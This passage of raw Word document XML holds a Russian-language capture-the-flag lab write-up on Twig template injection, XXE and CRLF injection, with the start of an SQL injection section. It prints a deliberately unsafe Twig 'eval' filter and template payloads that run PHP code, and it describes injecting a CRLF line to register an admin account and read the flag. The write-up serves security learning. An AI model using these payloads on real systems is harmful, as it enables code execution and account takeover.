      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="0000bb"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$twig</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="007700"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="0000bb"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">addFilter</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="007700"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(new </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="0000bb"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Twig_Filter</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="007700"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="dd0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'eval'</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="007700"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, function (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="0000bb"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$str</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="007700"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) { </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000028">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="007700"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="007700"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    return eval(</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="0000bb"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$str</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="007700"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000029">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Тут использована небезопасная функция eval. Ее и будем использовать для получения флага.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002A">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">{{"echo '123';"  | eval}} -&gt; эхо работает))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002B">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">{{" phpinfo();"  | eval}} -&gt; дает много полезной инфы :)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002C">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">И, собственно, юзаем функцию file_get_contents чтобы распечатать /var/www/html/ssti.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002D">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="22352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sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Меры защиты от SSTI стандартны. Sanitization в первую очередь. Касательно шаблонизаторов (здесь twig)  основаная проблема = обьект _self, который имеет атрибут env</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002F">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Много эксплойтов основывается на этом.</w:t>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color w:val="b7b7b7"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_63ld2x6yj4xn" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XXE: D Grade  </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="b7b7b7"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">aka XML TO JSON</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000031">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_4bah2xa0315m" w:id="12"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Flag Location:  /var/www/html/flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000032">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="212529"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The software processes an XML document that can contain XML entities with URIs that resolve to documents outside of the intended sphere of control, causing the product to embed incorrect documents into its output..</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000033">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">С помощью формы для загрузки xml -&gt; json закинем наш xml с добрым кодом. Уязвимость основана на включении секции DTD, а секции DTD, в свою очередь, могут подключать к документу внешние сущности. Вот и подключим нашу внешнюю сущность. Ниже, на скриншоте все очень доступно (и да, спасибо презентации :D )</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000034">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="29845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color w:val="b7b7b7"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_10lda3yxav8q" w:id="13"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CRLF Injection: C   </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="b7b7b7"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">aka back to 2000’s</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000037">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_hljbzxivg6b6" w:id="14"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Flag Location:  /var/www/html/flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000038">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="212529"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This lab shows how to easy return to 2000s, when databases were used not everywhere to store data. The software get user input, but does't sanitize it or sanitizes incorrectly. Special chars can be interpreted as line delimiters when they are sent to a internal component.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000039">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Честно говоря, без подсказки в телеграм-чатике тупил 2 дня :( Сама уязвимость достаточно простая, crlf aka \r\n aka %0a%0d</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003A">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Понадобится BurpSuite, настройка прокси в браузере (локалхост 127.0.0.1). После этого отлавливаем два пакета. Один reg, второй auth.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003B">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2755900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">В burpsuite отлавливаем нужные пакеты, кидаем на репитер. И юзаем уязвимости. Что происходит по факту? Мы в поле логин вбиваем любую информацию, потом использую crlf вбиваю свою строчку кода, которая запишется в “базу” данных aka блокнот :) будет строка выглядеть примерно так:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003D">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Роль Имя Пароль </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003E">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Admin true_admin666 true_admin666</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003F">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(где пароль, а  где логин не стал определять точно)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000040">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5267325" cy="6477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673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sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="2952750" cy="2054225"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="8" name="image7.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image7.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:srcRect b="20418" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2952750" cy="20542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28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Получаем респонс ОК. Осталось только зайти под нашим тру_админ666 и получить флаг (тоже запрос в берп сьюит).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000043">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000044">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000045">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4295775" cy="2876550"/>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2957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sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">{"flag":"4d0beb1562755ffa5641e249c9b05bb5","login":"true_admin666","role":"admin"}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000047">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000048">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="212529"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Причина: unsanitized input. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000049">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_a4eyucbav8g" w:id="15"/>
      <w:bookmarkEnd w:id="15"/>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color w:val="b7b7b7"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_udjsnehi9m8x" w:id="16"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL Injection: C </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="b7b7b7"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">aka use the D-grade inject’s</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
